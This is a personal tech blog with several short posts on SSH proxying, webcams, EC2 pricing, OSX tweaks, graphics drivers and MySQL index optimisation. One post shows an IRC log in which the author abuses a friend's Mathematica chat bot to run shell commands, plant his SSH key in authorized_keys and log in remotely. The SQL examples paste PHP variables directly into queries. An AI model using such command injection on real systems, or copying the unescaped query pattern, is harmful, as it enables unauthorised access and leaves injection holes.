Well given my previous rants on the subject of cable TV (1, 2, 3) I guess I should share my $0.02 on the latest FCC stupidity.
The truth is that I don't care anymore, I canceled Cable TV back in November and haven't missed it at all. As far as SOC goes, I can't say this is suprising given the FCC's complete disregard for their mandate to ensure that the cable tv system remains open. For those just tuning in, this is not just wishful thinking on my part. The Telecommunications Act of 1996 and the FCC Report and Order that implements the TCA both state this as a goal.
The FCC only granted a limited wavier to the SOC ban, but I doubt it will stay limited for very long.
So a few of the networks I have access to require me to SSH into a specific machine to gain access to the network. Previously I used a command like this:
ssh -t bastion.example.net ssh internal.example.net
Now SSH has long had a ProxyCommand so that it could route its traffic through the standard I/O of another program. The trouble is that SSH itself was not capable of acting as this other program. Then I saw this in the OpenSSH 5.4 release notes:
* Added a 'netcat mode' to ssh(1): "ssh -W host:port ..." This connects
stdio on the client to a single port forward on the server. This
allows, for example, using ssh as a ProxyCommand to route connections
via intermediate servers. bz#1618
Here is the .ssh/config file for those who are lazy:
Host internal.example.net
ProxyCommand ssh -qW %h:%p bastion.example.net
Now I can log in with just:
ssh internal.example.net
Bonus? scp works over this just fine.
I was finally persuaded to fix my webcam. The cam had been running through the qc-usb driver and a little xawtv utility. The trouble is that qc-usb is v4l and that doesn't work with the newer kernels. The nice thing about the xawtv plugin was that it automatically scp'ed the image to my webserver for me.
The new v4l2 layer of the kernel has built in support for my webcam, but I had trouble finding a [bold]command line[/bold] utility to power it. So many webcam apps will just try to pull in gnome :( I eventually went with fswebcam. I no longer scp images to my webserver, I setup Apache's mod_proxy to pull the image from another webserver (lighttpd) on the box the webcam is attached to. Seems to be working quite well so far. The init script wrapper I made for fswebcam doesn't quite have a working stop target yet though.
I'm considering rewriting my website in Python instead of PHP. The last major rewrite, going from MySQL to PostgreSQL, was definitely worth the effort. Not so sure Python has benefits over PHP though.
Amazon EC2 just rolled out a new instance type called a spot instance. So the short version is that each hour Amazon sets a spot price based on current supply and demand. Users of EC2 can have instances run as long as the price is beneath a spot limit that they set.
So I checked the recent spot pricing for an m1.small machine in the us-east zone and its between $0.025 and $0.035 per hour. This same machine as an on-demand instance (the original type) is $0.085. Now Amazon's goal is clearly to monetize their idle CPU time by offering a low cost option for data analysis work. But, if we make one little assumption we can use it to get a discount for on-demand instance.
So what do you think the chances are that Amazon has capped the spot price at the normal instance price? If they did, then you could just convert all your on demand instances to spot instances with the spot limit set to the normal price. That way your instance always stays up and you get a discount when the spot price is lower!
This only works for on demand instances though, a 3-year reserved instance is $0.041/hr and a 1-year reserved instance is
$0.056/hr for that same machine type. Depending on where the market goes, its probably a safer bet to keep those reservations.
Update: On a side note, I wonder if Amazon will actually bill me $0.052 for the two $0.026 instances I started for a moment while playing with it. I've always wanted to write a check to my credit card company for $0.06
I really wish Apple would allow focus follows mouse in OSX outside of just Terminal.app and X11.app. Even Windows supports it, the setting is available in TweakUI.
Lots of people say I'm crazy when I talk about focus follows mouse and I eventually learn they think focus means which window is on top. So let me clarify:
Focus means which window gets keyboard input.
Focus does not mean which window is on top.
The confusion comes from the fact that OSX and Windows automatically put the window with focus on top, this is actually called autoraise. Autoraise and focus follows mouse are related features that should both be configurable. As you can see in the following screenshot, TweakUI allows autoraise to be enabled or disabled if focus (called activation) follows mouse is enabled.

Why won't Apple give us the ability to enable focus follows mouse and disable autoraise?
The VBox 3.1 changelog noted something about disabling the dock on OSX. So I did some googling, eventually found a shareware app that could also do it. I reverse engineered that and found these:
defaults write com.apple.dock orientation -string bottom
defaults write com.apple.dock pinning -string end
defaults write com.apple.dock autohide -bool true
defaults write com.apple.dock tilesize -float 1e-17
Why would I pay $14.95 for that?
For the curious the legitimate values for those keys are:
defaults write com.apple.dock orientation -string [left|bottom|right]
defaults write com.apple.dock pinning -string [start|middle|end]
defaults write com.apple.dock autohide -bool [true|false]
defaults write com.apple.dock tilesize -integer [1-256]
The OSX Preferences GUI only allows tilesizes from 16 to 128 and doesn't allow setting the pinning value.
I updated my desktop to the 2.6.32 kernel today and was greated with a pleasent suprise. I have 3d acceleration with the open source radeon X driver now! I stopped using the closed source fglrx driver a few months ago because ATI dropped support my laptop's graphics card. This kind of pissed me off because that card isn't even 3 years old yet.
I'm not sure if it was the new graphics layer in the 2.6.32 kernel or an update to Xorg that I hadn't restarted X for that did it. Regardless of how it happened, it is awesome. I tried enabling KMS support too, but I need the 1.7 release of Xorg for that I'm still on 1.6.
I've been getting my quake3 fix today...
My friend linked mathematica into an IRC channel, so I started playing with commands like Run[], FilePrint[], etc., You know, the ones that let you run system commands:
14:27 <@mjgardes> if you get your ssh key in there, what will you do with it?
14:27 < NUXI> im not sure
14:28 <@mjgardes> it's behind NAT
14:28 < NUXI> math: "ssh-rsa *snip" >> /home/math/.ssh/authorized_keys
A little bit later (after he hardens it more) something occurs to me:
15:12 < NUXI> math: FilePrint[FromCharacterCode[{33}] <> "bash -c
'echo;/sbin/ifconfig eth0'"]
15:12 < math> eth0 Link encap:Ethernet HWaddr 00:16:d4:dd:e4:c2
15:12 < math> inet addr:192.168.0.37 Bcast:192.168.0.255 Mask:255.255.255.0
15:12 < math> inet6 addr: 2001:5c0:1103:1400:216:d4ff:fedd:e4c2/64
Scope:Global
15:12 < math> inet6 addr: fe80::216:d4ff:fedd:e4c2/64 Scope:Link
15:12 < math> UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
15:12 < math> RX packets:1141505 errors:0 dropped:0 overruns:0 frame:0
15:12 <@mjgardes> crud
Isn't that a lovely IPv6 address?
nuxi@nobel:~(130)$ ssh math@2001:5c0:1103:1400:216:d4ff:fedd:e4c2
Last login: Tue Dec 8 13:30:55 EST 2009 from babylon.chroma on pts/8
math@merle ~ $
I win!
My friend recently asked for some assistance optimizing some SQL. You might want to read the code on his page, I don't have a pretty syntax highlighter in my blog. I don't usually use MySQL because I prefer Postgres, but the offer a free beer prompted me to take a peek anyway.
His database schema was as follows:
CREATE TABLE IF NOT EXISTS `MyDatabase`.`TRK` (
`id` int( 11 ) NOT NULL AUTO_INCREMENT PRIMARY KEY ,
`latitude` float NULL ,
`longitude` float NULL ,
`altitude` float NULL ,
`date` date NULL ,
`time` time NULL
) ENGINE = MYISAM DEFAULT CHARSET latin1 AUTO_INCREMENT=1 ;
CREATE UNIQUE INDEX lldt ON `MyDatabase`.`TRK` (`latitude`,`longitude`,`date`,`time`);
And the query that needed help is:
SELECT latitude, longitude, date, time, CONCAT(date, ' ', time) AS trk_dt_0,
'$dat1 $tim1' AS trk_dt_1 FROM TRK WHERE UNIX_TIMESTAMP(CONCAT(date, ' ', time)) >
UNIX_TIMESTAMP('$dat1 $tim1') ORDER BY UNIX_TIMESTAMP(trk_dt_0) ASC LIMIT 1;
Generally speaking the first step of optimization should be ensuring that the WHERE clause of your query is using an index. In this case, the WHERE clause is not even directly working on fields of the database. A short description of how this query runs would be:
1. Retrieve a row from the database
2. Combine the date and time fields
3. Compare them against the specified value
4. If it matches add to the result set
5. Repeat until end of database reached
6. Order the results
7. Select the first one
So the first step in optimizing this query is to just combine date and time fields in the database. The two halves can easily be seperated in the PHP application if necessary.
CREATE TABLE IF NOT EXISTS `MyDatabase`.`TRK` (
`id` int( 11 ) NOT NULL AUTO_INCREMENT PRIMARY KEY ,
`latitude` float NULL ,
`longitude` float NULL ,
`altitude` float NULL ,
`datetime` datetime NULL ,
) ENGINE = MYISAM DEFAULT CHARSET latin1 AUTO_INCREMENT=1 ;
CREATE UNIQUE INDEX lldt ON `MyDatabase`.`TRK` (`latitude`,`longitude`,`datetime`);
Obviously this had to be done through a more complex conversion script for the live database. You would do that by adding the new column, running a script to copy the data from the seperate date and time fields into the combined field, and then delete the two old columns. So the new SQL query looks like this:
SELECT latitude, longitude, datetime, '$dat1 $tim1' AS trk_dt_1 FROM TRK WHERE
datetime > '$dat1 $tim1' ORDER BY datetime ASC LIMIT 1;
At the very least we have less typing for the programmer, but this alone apparently brought the runtime from over 11 hours to 45 minutes! Consider the steps now used:
1. Retrieve a row from the database
2. Compare the datetime against the specified value
3. If it matches add to the result set
4. Repeat until end of database reached
5. Order the results
6. Select the first one
The next step in optimization is to actually add our index to the datetime field.
CREATE UNIQUE INDEX dt ON `MyDatabase`.`TRK` (`datetime`);
Now the WHERE clause of the SQL query operates against the index instead of the full table. Searching an index is much faster than searching the database as a whole. A full row only needs to be retrieved if it is part of the result set.
So now the steps taken by the database engine are:
1. Retrieve a row from the index
2. Compare the datetime against the specified limit
3. If it matches add to full row from the database to the result set
4. Repeat until end of index reached
5. Order the results
6. Select the first one
Another benefit in this case is that our results are also sorted by the index and generally speaking the index itself is sorted...
1. Retrieve a row from the index
2. Compare the datetime against the specified value
3. If it matches, return the full row from the database and exit
4. Repeat until end of index reached
Now the first row that matches will cause the search to just exit. This optimization brought the overall runtime from 45 minutes to 3 seconds! Thats right, it apparently ran in 3 seconds.
My friend Peter suggested another optimization that he has told me about in the past. One SELECT query that returns 10 rows is much faster than 10 SELECT queries that return one row each. The application in this case is actually requesting every row of the database twice! First it requests every database row, and then for each one it requests the row immediately following it chronologically. With a little redesign the SQL query in the loop could be removed:
The redesigned PHP with only a single SQL query
Another minor optimization you can usually perform is defining fields as NOT NULL unless you actually need to store null data. I read a blog post once that claimed NULL was the biggest mistake in SQL design. Whether or not that is true is way above my head, but you can definitely squeak a tiny bit more performance out by not allowing NULL if you don't have to.
CREATE TABLE IF NOT EXISTS `MyDatabase`.`TRK` (
`id` int( 11 ) NOT NULL AUTO_INCREMENT PRIMARY KEY ,
`latitude` float NOT NULL DEFAULT '0',
`longitude` float NOT NULL DEFAULT '0',
`altitude` float NOT NULL DEFAULT '0',
`datetime` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
) ENGINE = MYISAM DEFAULT CHARSET latin1 AUTO_INCREMENT=1 ;
What I've mentioned above is nearly universally true, although creating a lot of different indexes will eventually slow down your database. What I mention below is more in the deep magic category, it may help or hurt your performance. You should always explore the benefits using things like the EXPLAIN command. EXPLAIN is not a standard SQL command, so here is the Postgres and MySQL documentation.
One trick on tables with lots of fields where we regularly need a very small subset of the data is to simply put all the fields in our index. My friend's database already had such an index, but the EXPLAIN command showed it was unused.
CREATE UNIQUE INDEX lldt ON `MyDatabase`.`TRK` (`latitude`,`longitude`, `datetime`);
By redefining this index with datetime first, MySQL will use it when running the search.
CREATE UNIQUE INDEX lldt ON `MyDatabase`.`TRK` (`datetime`, `latitude`,`longitude`);
So now the operation of the database is:
1. Retrieve a row from the index
2. Compare the datetime against the specified value
3. If it matches, return the row from the index and exit
4. Repeat until end of index reached
Combining the two indexes on my friend's database will help the performance of INSERT, UPDATE, and DELETE, but it may end up slowing down SELECT. Only by actually testing it would you be able to tell if it was worth it.